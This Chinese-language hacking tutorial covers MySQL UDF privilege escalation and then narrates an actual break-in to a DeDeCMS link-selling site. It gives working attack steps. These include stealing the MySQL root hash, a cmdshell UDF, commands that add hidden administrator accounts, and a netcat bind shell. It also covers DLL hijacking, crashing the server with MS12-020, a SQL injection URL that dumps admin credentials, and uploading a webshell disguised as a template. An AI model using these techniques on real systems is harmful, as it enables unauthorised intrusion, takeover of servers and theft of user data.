Mysql提权>>入侵提权>>中国云安网 Www.Yunsec.Net -
热门关键字： 　　 　 　 　 　
摘要：000 简介 001 前言 002 手工提权,自动提权 003 启动项提权,DLL劫持提权 004 mysql降权提权 000 简介 MySQL是一个中、小型关系型数据库管理系统，由瑞典MySQL AB公司开发，目前属于Oracle公司。MySQL是一种关联数据库管理系统，关联数据库将数据保存在不同的...
0&02 手工,自动提权
0&03 启动项提权,DLL劫持提权
0&04 mysql降权提权
MySQL是一个中、小型关系型数据库管理系统，由瑞典MySQL AB公司开发，目前属于Oracle公司。MySQL是一种关联数据库管理系统，关联数据库将数据保存在不同的表中，而不是将所有数据放在一个大仓库内，这样就增加了速度并提高了灵活性。MySQL的SQL语言是用于访问数据库的最常用标准化语言。MySQL软件采用了GPL（GNU通用公共许可证），它分为免费版和商业版，由于其体积小、速度快、总体拥有成本低，尤其是开放源码这一特点，一般中小型网站的开发都选择MySQL作为网站数据库。由于其免费版的性能卓越，搭配PHP和Apache可组成良好的开发环境。
利用mysql提权的前提就是,安装了mysql,mysql的服务没有降权,(降权也可以提,没降权的话就最好了),是默认安装以系统权限继承的(system权限). 并且获得了root的账号密码.这里有一篇mysql权限的/wenzhai/ruqin/07.html 有兴趣的可以去了解了解.
先来说说我是咋判断一台服务器上的mysql有没有降权的. 0.0如果能运行cmd的话,我会先看看有啥用户先,如果有mysql mssql这样用户名,或者类似的.我就会猜测他的mssql服务或者mysql的已经被降权运行了.但并不代表不能提权,只要能运行cmd..
接着说一下,判断服务器上是否开启了mysql服务. 一般在拿到webshell的时候,都会扫描一下端口,如果开启了3306端口的话,我会telnet 过去看看- -.忘了有无回显~(提权的时候,大多数 3306端口的都是不支持外链的.呃,我遇到的大多数是这样, 有root可以开启外链.) 当然也有一些管理员会把mysql的默认端口改掉.另外一个判断的方法就是网站是否支持php,一般支持php的网站都用mysql数据库的.php+mysql啊,好基友啊好丽友- -~（当然,也有一些网站用其他的一些更专业的数据库）.
再说说如何查找mysql root的密码.
MYSQL所有设置默认都保存在&C:\Program Files\MYSQL\MYSQL Server 5.0\data\MYSQL&中，也就是安装程序的data目录下，如图2所示，有关用户一共有三个文件即user.frm、user.MYD和 user.MYI，MYSQL数据库用户密码都保存在user.MYD文件中，包括root用户和其他用户的密码。
User.frm user.myd User.myi
这几个文件.在webshell下,下载下来,解密.用c32asm或者其他的一些文本编辑器user.MYD打开.
复制到那查一下,或者用cain爆破一下.
打开后使用二进制模式进行查看，如图所示，可以看到在root用户后面是一串字符串，选中这些字符串将其复制到记事本中，这些字符串即为用户加密值，即A30FBDFC9 。
具体使用cain破解的,我这就不演示了.参考一下/network/hack/235.html
还有一个查找的方法就是,一些php网站安装的时候用的是root用户,例如dedecms,他数据库安装的信息就是写在data/common.inc.php
Discuz的数据库信息就在config/config_global_default.php
0&02 手工提权,自动提权
我们找到了mysql的root账号密码,先记录下来.账号:root,密码:zkeys
第一步,我们先在php webshell下点击 mysql执行.输入账号root,密码zkeys 库名mysql(mysql这个库是默认安装mysql服务的时候就存在的了,还有test . Mysql库里存的是mysql的账号密码 和其他的一些设置.)
版本5.0.51b-community-nt
这里说一下,UDF提权,5.0版本以下(包括5.0的)放到系统目录就可以利用.
在mysql 5.1以上的版本为了以防利用,更改了,不能导出到系统目录下创建自定义函数。
只能导出在mysql安装目录下的lib/plugin目录中。
这里我先演示一下5.0的手工提权吧.等会自动提权我用5.1的来演示.
这里用到langouster写的udf提权工具.我们填写账号密码和库名然后点击提交.就登陆了.
第一步导出udf。
这个udf我自己改了一下。。
第二步创建cmdshell功能函数.
Create Function 函数名（函数名只能为下面列表中的其中之一） returns string soname &导出的DLL路径&；
Create Function cmdshell returns string soname &udf.dll&;
功能函数说明：
cmdshell 执行
downloader 下载者,到网上下载指定文件并保存到指定目录;
open3389 通用开3389终端服务,可指定端口(不改端口无需重启);
backshell 反弹S
ProcessView 枚举系统进程;
KillProcess 终止指定进程;
regread 读注册表;
regwrite 写注册表;
shut 关机,注销,重启;
about 说明与帮助函数;
第三步 执行cmd命令
select cmdshell(&net user&);
执行后没显示账号的话,就说明变量或者net 设置了权限.我们手工传一个net.exe
传到C盘回收站那目录了.
select cmdshell(&C:\\RECYCLER\\net user&);
看到了吧.显示了~ 再传一个whoami.看看权限.
System权限.
select cmdshell(&C:\\RECYCLER\\net user xiaoguai
/add & c:\\RECYCLER\\net localgroup administrators xiaoguai /add&);
最后我们来看看xiaoguai这个账号创建了没
select cmdshell(&C:\\RECYCLER\\net user xiaoguai&);
好了,添加上去了.
接着演示自动提权,
登陆后,导出udf.成功的话他会提示.
第一步创建cmdshell
第二步添加超级管理员
完工,创建账号$darckmoon 密码123456 的管理员账号.
0&03 启动项提权,DLL劫持提权
导出bat,就是把bat写进启动项去,导出dll就是劫持mysql安装目录下的bin 的mysqld.
导出完毕后,我们利用其他的一些方法让服务器重启(,蓝屏溢出啊,社工管理员让他重启).或者就干等吧.
这里我用ms12020来溢出这台服务器 ,让他重启.达到我们提权的目的
服务器蓝屏了,等他重启,我们的lpk和启动项的bat就会运行了.
已经创建成功了。
0&04 mysql降权提权
最后我们来演示一下mysql降权的udf提权方法.
生成一个udf.dll文件(把nc和cmd传到一个可写的目录去)
C:\RECYCLER\cmd.exe
C:\RECYCLER\nc.exe -l -p 110 -t -e C:\RECYCLER\cmd.exe
然后用我改的php mysql提权的，先把dll文件传到网站目录下,再传到mysql安装的bin目录下.文件名lpk.dll
导出以后我们等服务器重启,之后telnet 服务器ip 110
Telnet 过去了.获得一个cmdshell.我们在那目录下传提权exploit吧.
Cd C:\RECYCLER ///切换到exploit目录
ms11046.exe ///运行ms11046 exploit
创建账号90sec 密码90sec成功.
标签分类：织梦dedecms网站的渗透&后台+shell+提权
说一下目标，本来是渗透某链接网站，专门给网站挂链接的那种，一次收费20元，免审核。流量超大，排名很高的那种网站...
手工尝试一下常见目录和后台,没有发现，目测也看不出是啥cms，看一下robots.txt，竟然没有，无果。
所话说，知己知彼，百战不殆。只有对目标了如指掌了，才能得心应手的去ooxx。
继续逛，发现了这个主站有很多旗下网站，就打开看看，xx站长网，内容也很多站长资讯，，SE教程等等吧，
在网站的右上角有【用户登录】，果断点开看看...
<img src="/blog7style/images/common/sg_trans.gif" real_src ="/uploadfile/388.jpg" ALT="织梦dedecms网站的渗透 后台+shell+提权" WIDTH="553"
TITLE="织梦dedecms网站的渗透&后台+shell+提权" />
竟然logo都没修过...无语了...细节绝对成败...好吧，果断上exp
/plus/search.?keyword=as&typeArr[111=@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`#@__admin`#@`\'`+]=a
<img src="/blog7style/images/common/sg_trans.gif" real_src ="/uploadfile/283.jpg" ALT="织梦dedecms网站的渗透 后台+shell+提权" WIDTH="565"
TITLE="织梦dedecms网站的渗透&后台+shell+提权" />
直接爆出账户和密码来了，我尽量写点详细点吧...
得到的是20位的MD5，去掉前3位和最后1位，然后就是16位的MD5值了，解之，得到了密码。
说到这里，基本上没有亮点，大多数的DEDE站都能爆出账号和密码，但是，同样大多数网站都把后台地址修改了啊。
输入dede回车，果然没有。
好吧，来试试老版本爆织梦路径的方法吧，
/include/dialog/select_soft.php&
/include/dialog/config.php
include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p
<img src="/blog7style/images/common/sg_trans.gif" real_src ="/uploadfile/153.jpg" ALT="织梦dedecms网站的渗透 后台+shell+提权" WIDTH="456"
TITLE="织梦dedecms网站的渗透&后台+shell+提权" />
提示需要输入后台地址，无果，再换一个方法：
/data/mysql_error_trace.inc
此文件记录mysql查询错误，如果有后台查询出现错误，则会暴露后台路径。
输入回车后，啥也没显示，蛋蛋疼了吧...
看了看robots.txt，很明显是织梦默认的robots，但是没有发现后台地址...
用工具扫一下吧...
一般被修改了默认后台地址的，用工具扫出来的几率几乎为0，因为把dede修改为常见的admin等类似地址，
等于没修改，但我们不能放过任何一个机会，边扫边手工尝试几个...
尝试了网站名字，跟拼音首字母，也无果，工具也扫完了，no found ！
既然是某某旗下网站，那尝试一下主站的名字吧，也无果，继续各种尝试ing....
打算准备放弃了，最后把域名复制了一下，回车后，竟然来到了熟悉的登录框...
织梦后台拿shell的方法很多，文件管理器里面没有东东，那就新建模板吧。
【模版】----【默认模板管理】----【上传模板】---【选择文件】
<img src="/blog7style/images/common/sg_trans.gif" real_src ="/uploadfile/207.jpg" ALT="织梦dedecms网站的渗透 后台+shell+提权" WIDTH="600"
TITLE="织梦dedecms网站的渗透&后台+shell+提权" />
将php大马或者一句话修改为fuck..htm,然后上传...
<img src="/blog7style/images/common/sg_trans.gif" real_src ="/uploadfile/227.jpg" ALT="织梦dedecms网站的渗透 后台+shell+提权" WIDTH="600"
TITLE="织梦dedecms网站的渗透&后台+shell+提权" />
上传后，可以直接打开...
<img src="/blog7style/images/common/sg_trans.gif" real_src ="/uploadfile/735.jpg" ALT="织梦dedecms网站的渗透 后台+shell+提权" WIDTH="555"
TITLE="织梦dedecms网站的渗透&后台+shell+提权" />
打开我们的马...下一步，提权...
对于php网站，我一般用mysql提权，但是前提必须的root权限，好，来看一下:
/data/config.file.inc.php
<img src="/blog7style/images/common/sg_trans.gif" real_src ="/uploadfile/900.jpg" ALT="织梦dedecms网站的渗透 后台+shell+提权" WIDTH="600"
TITLE="织梦dedecms网站的渗透&后台+shell+提权" />
编辑---可以看到信息，数据库名，用户，密码等，没有让我失望，是root权限，哈哈..
打开提权，输入密码，安装DLL，如图:
<img src="/blog7style/images/common/sg_trans.gif" real_src ="/uploadfile/916.jpg" ALT="织梦dedecms网站的渗透 后台+shell+提权" WIDTH="600"
TITLE="织梦dedecms网站的渗透&后台+shell+提权" />
提示安装成功...
执行 ver 回显:
Microsoft Windows [版本 5.2.3790]
& & succeed!
然后添加账户，提升管理组，各种成功。
远程连接，显示登陆页面，竟然开了3389端口，呵呵，...又省事了
<img src="/blog7style/images/common/sg_trans.gif" real_src ="/uploadfile/160.jpg" ALT="织梦dedecms网站的渗透 后台+shell+提权" WIDTH="585"
TITLE="织梦dedecms网站的渗透&后台+shell+提权" />
发现是一个VPS，旗下网站都在这上面，没有主站，但上面也有好几千人的数据...
已投稿到：
以上网友发言只代表其个人观点，不代表新浪网的观点或立场。phantomer's blog的推荐 | LOFTER（乐乎） - 记录生活，发现同好
LOFTER for ipad —— 记录生活，发现同好
phantomer's blog 的推荐
&nbsp&nbsp被喜欢
&nbsp&nbsp被喜欢
{list posts as post}
{if post.type==1 || post.type == 5}
{if !!post.title}${post.title|escape}{/if}
{if !!post.digest}${post.digest}{/if}
{if post.type==2}
{if post.type == 3}
{if !!post.image}
{if post.type == 4}
{if !!post.image}
{if !!photo.labels && photo.labels.length>0}
{var wrapwidth = photo.ow < 500?photo.ow:500}
{list photo.labels as labs}
{var lbtxtwidth = Math.floor(wrapwidth*(labs.ort==1?labs.x:(100-labs.x))/100)-62}
{if lbtxtwidth>12}
{if !!labs.icon}
{list photos as photo}
{if photo_index==0}{break}{/if}
品牌${make||'-'}
型号${model||'-'}
焦距${focalLength||'-'}
光圈${apertureValue||'-'}
快门速度${exposureTime||'-'}
ISO${isoSpeedRatings||'-'}
曝光补偿${exposureBiasValue||'-'}
镜头${lens||'-'}
{if data.msgRank == 1}{/if}
{if data.askSetting == 1}{/if}
{if defined('posts')&&posts.length>0}
{list posts as post}
{if post_index < 3}
{if post.type == 1 || post.type == 5}
{if !!post.title}${post.title|escape}{/if}
{if !!post.digest}${post.digest}{/if}
{if post.type == 2}
{if post.type == 3}
{if post.type == 4}
{if drlist.length>0}
更多相似达人：
{list drlist as dr}{if drlist.length === 3 && dr_index === 0}、{/if}{if drlist.length === 3 && dr_index === 1}、{/if}{if drlist.length === 2 && dr_index === 0}、{/if}{/list}
暂无相似达人，
{if defined('posts')&&posts.length>0}
{list posts as post}
{if post.type == 2}
{if post.type == 3}
{if post.type == 4}
this.p={ dwrMethod:'querySharePosts', fpost:'37f8db_11d3968',userId:3792692,blogListLength:3};